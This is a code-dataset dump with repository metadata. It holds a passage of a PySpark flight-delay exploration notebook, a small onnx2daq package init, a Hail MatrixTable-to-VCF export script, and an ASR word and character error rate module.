# COMMAND ----------
# See if there are duplicate rows - if so, this will differ from just count()
df_flights_full.distinct().count()
# COMMAND ----------
# How many duplicates?
df_flights_full.count() - df_flights_full.dropDuplicates().count()
# COMMAND ----------
# How many duplicates and missing values?
df_flights_full.count() - df_flights_full.dropDuplicates().dropna(how="any", subset=["DepDelay", "ArrDelay"]).count()
# COMMAND ----------
# Summary statistics
display(df_flights_full.describe())
# COMMAND ----------
# Descriptive stats may not make sense for all columns in the df, so let's just get desc stats for a subset
display(df_flights_full.describe().select("summary", "DepDelay", "ArrDelay"))
# COMMAND ----------
# Get top rows - head(n) or take(n)
display(df_flights_full.head(5))
# COMMAND ----------
df_flights_full.show(Truncate=False)
# COMMAND ----------
# limit(n), head(n), take(n)
display(df_flights_full.head(7))
# COMMAND ----------
df_flights_full.explain()
# COMMAND ----------
# MAGIC %md
# MAGIC #### Stats
# COMMAND ----------
df_flights_full.approxQuantile("ArrDelay", [0.25, 0.5, 0.75], 0.1)
# COMMAND ----------
display(df_flights_full.freqItems(["DestAirportID"]))
# COMMAND ----------
# Check correlation between two fields
df_flights_full.corr("DepDelay", "ArrDelay")
# COMMAND ----------
display(df_flights_full.select("DepDelay", "ArrDelay"))
# COMMAND ----------
| 19.336538 | 117 | 0.655893 | 251 | 2,011 | 5.103586 | 0.442231 | 0.119438 | 0.172521 | 0.093677 | 0.246682 | 0.115535 | 0.115535 | 0.070258 | 0 | 0 | 0 | 0.007407 | 0.1273 | 2,011 | 103 | 118 | 19.524272 | 0.722507 | 0.56191 | 0 | 0 | 0 | 0 | 0.115012 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5f31ec7b6d809900feb1de6c282c008dc5ae47f | 50 | py | Python | tools/onnx2daq/python/onnx2daq/__init__.py | Anon-Artist/DNNLibrary | 6e38a880a90c28ff238a80f44c7d35ffd3eedae8 | [
"Apache-2.0"
] | 199 | 2019-02-14T05:44:27.000Z | 2022-03-29T09:48:35.000Z | tools/onnx2daq/python/onnx2daq/__init__.py | Anon-Artist/DNNLibrary | 6e38a880a90c28ff238a80f44c7d35ffd3eedae8 | [
"Apache-2.0"
] | 26 | 2019-02-18T07:18:17.000Z | 2021-05-29T11:42:08.000Z | tools/onnx2daq/python/onnx2daq/__init__.py | Anon-Artist/DNNLibrary | 6e38a880a90c28ff238a80f44c7d35ffd3eedae8 | [
"Apache-2.0"
] | 33 | 2019-02-16T09:23:46.000Z | 2022-02-19T07:24:22.000Z | from .convert import convert, simplify_and_convert | 50 | 50 | 0.88 | 7 | 50 | 6 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 50 | 1 | 50 | 50 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 5 |
e5f5488490016c728274b70ed9f953908256998b | 1,788 | py | Python | reanalysis/mt_to_vcf.py | populationgenomics/automated-interpretation-pipeline | 64afbf396dcc2f4f2330cdfd0414238560910e93 | [
"MIT"
] | null | null | null | reanalysis/mt_to_vcf.py | populationgenomics/automated-interpretation-pipeline | 64afbf396dcc2f4f2330cdfd0414238560910e93 | [
"MIT"
] | 4 | 2022-03-28T06:28:01.000Z | 2022-03-31T00:16:02.000Z | reanalysis/mt_to_vcf.py | populationgenomics/automated-interpretation-pipeline | 64afbf396dcc2f4f2330cdfd0414238560910e93 | [
"MIT"
] | null | null | null | """
Takes an input MT, and extracts a VCF-format representation.
This is currently required as the end-to-end CPG pipeline doesn't currently
store intermediate files. To simulate workflows running on VCF files, we
have to regenerate a VCF representation from a MT.
Optional argument allows the specification of an 'additional header' file
When Hail extracts a VCF from a MT, it doesn't contain any custom field
definitions, e.g. 'VQSR' as a Filter field. This argument allows us to
specify additional lines which are required to make the final output valid
within the VCF specification
"""
from typing import Optional
from argparse import ArgumentParser
import hail as hl
from cpg_utils.hail_batch import init_batch
def main(input_mt: str, output_path: str, additional_header: Optional[str] = None):
"""
takes an input MT, and reads it out as a VCF
:param input_mt:
:param output_path:
:param additional_header: file containing lines to append to header
:return:
"""
init_batch()
matrix = hl.read_matrix_table(input_mt)
hl.export_vcf(
matrix,
output_path,
append_to_header=additional_header,
tabix=True,
)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument(
'--input',
type=str,
help='input MatrixTable path',
)
parser.add_argument('--output', type=str, help='path to write VCF out to')
parser.add_argument(
'--additional_header',
type=str,
help='path to file containing any additional header lines',
required=False,
default=None,
)
args = parser.parse_args()
main(
input_mt=args.input,
output_path=args.output,
additional_header=args.additional_header,
)
| 28.380952 | 83 | 0.69519 | 247 | 1,788 | 4.890688 | 0.404858 | 0.10596 | 0.042219 | 0.023179 | 0.056291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229306 | 1,788 | 62 | 84 | 28.83871 | 0.876633 | 0.414989 | 0 | 0.117647 | 0 | 0 | 0.138034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.117647 | 0 | 0.147059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f5c14f40a001a742cdc89ea72f7c6f1ffa6230 | 3,787 | py | Python | asrtoolkit/wer.py | kaleko/greenkey-asrtoolkit | a729e25ae9c1c65b3c9f25438eb67dba8d03a730 | [
"Apache-2.0"
] | null | null | null | asrtoolkit/wer.py | kaleko/greenkey-asrtoolkit | a729e25ae9c1c65b3c9f25438eb67dba8d03a730 | [
"Apache-2.0"
] | 1 | 2020-02-07T19:20:07.000Z | 2020-02-07T19:27:19.000Z | asrtoolkit/wer.py | kaleko/greenkey-asrtoolkit | a729e25ae9c1c65b3c9f25438eb67dba8d03a730 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Python function for computing word error rates metric for Automatic Speech Recognition files
"""
import argparse
import re
import editdistance
from asrtoolkit.clean_formatting import clean_up
from asrtoolkit.data_structures.time_aligned_text import time_aligned_text
from asrtoolkit.file_utils.script_input_validation import assign_if_valid
# Matches tagged noises / nonspeech events such as "[noise]" or "<silence>"
# so they can be stripped from transcripts before scoring.
re_tagged_nonspeech = re.compile(r"[\[<][A-Za-z #]*[\]>]")

# Non-silence noise (nsn) tokens that may optionally be ignored when
# computing error rates (see the remove_nsns flag in wer/cer).
nonsilence_noises = [
    "noise",
    "um",
    "ah",
    "er",
    "umm",
    "uh",
    "mm",
    "mn",
    "mhm",
    "mnh",
    "huh",
    "hmm",
]
# Word-boundary-delimited alternation over all nsn tokens above.
re_nonsilence_noises = re.compile(r"\b({})\b".format(
    "|".join(nonsilence_noises)))
def remove_nonsilence_noises(input_text):
    """
    Delete non-silence noise tokens (um, uh, hmm, ...) from a transcript
    """
    return re_nonsilence_noises.sub("", input_text)
def wer(ref, hyp, remove_nsns=False):
    """
    Calculate word error rate between two string or time_aligned_text objects

    >>> wer("this is a cat", "this is a dog")
    25.0
    """
    # unwrap time_aligned_text inputs into plain transcripts
    if type(ref) == time_aligned_text:
        ref = ref.text()
    if type(hyp) == time_aligned_text:
        hyp = hyp.text()

    def _normalize(text):
        # drop tagged noises and other nonspeech events, optionally drop
        # non-silence noises, then apply the shared formatting cleanup
        text = re_tagged_nonspeech.sub(" ", text)
        if remove_nsns:
            text = remove_nonsilence_noises(text)
        return clean_up(text)

    ref_words = _normalize(ref).split(" ")
    hyp_words = _normalize(hyp).split(" ")

    # word-level edit distance as a percentage of the reference length
    return 100 * editdistance.eval(ref_words, hyp_words) / max(1, len(ref_words))
def cer(ref, hyp, remove_nsns=False):
    """
    Calculate character error rate between two strings or time_aligned_text objects

    >>> cer("this cat", "this bad")
    25.0
    """
    # unwrap time_aligned_text inputs into plain transcripts
    if type(ref) == time_aligned_text:
        ref = ref.text()
    if type(hyp) == time_aligned_text:
        hyp = hyp.text()

    # NOTE(review): unlike wer(), tagged nonspeech events are NOT stripped
    # here -- confirm whether that asymmetry is intentional.
    if remove_nsns:
        ref = remove_nonsilence_noises(ref)
        hyp = remove_nonsilence_noises(hyp)

    ref = clean_up(ref)
    hyp = clean_up(hyp)

    # character-level edit distance as a percentage of the reference length
    return 100 * editdistance.eval(ref, hyp) / max(1, len(ref))
def main():
    """
    Command-line entry point: score a transcript file against a reference
    file and print the word (or character) error rate.
    """
    parser = argparse.ArgumentParser(
        description=
        "Compares a reference and transcript file and calculates word error rate (WER) between these two files"
    )
    parser.add_argument("reference_file", metavar="reference_file", type=str,
                        help='reference "truth" file')
    parser.add_argument("transcript_file", metavar="transcript_file", type=str,
                        help="transcript possibly containing errors")
    parser.add_argument("--char-level", action="store_true",
                        help="calculate character error rate instead of word error rate")
    parser.add_argument("--ignore-nsns", action="store_true",
                        help="ignore non silence noises like um, uh, etc.")
    args = parser.parse_args()

    # load each input only if it is a supported file type
    ref = assign_if_valid(args.reference_file)
    hyp = assign_if_valid(args.transcript_file)

    if ref is None or hyp is None:
        print(
            "Error with an input file. Please check all files exist and are accepted by ASRToolkit"
        )
    elif args.char_level:
        print("CER: {:5.3f}%".format(cer(ref, hyp, args.ignore_nsns)))
    else:
        print("WER: {:5.3f}%".format(wer(ref, hyp, args.ignore_nsns)))


if __name__ == "__main__":
    main()
| 25.587838 | 111 | 0.639028 | 491 | 3,787 | 4.749491 | 0.321792 | 0.04717 | 0.064322 | 0.037736 | 0.282161 | 0.201544 | 0.175815 | 0.175815 | 0.175815 | 0.145798 | 0 | 0.006298 | 0.245313 | 3,787 | 147 | 112 | 25.761905 | 0.809657 | 0.19831 | 0 | 0.288889 | 0 | 0 | 0.185724 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.066667 | 0 | 0.144444 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |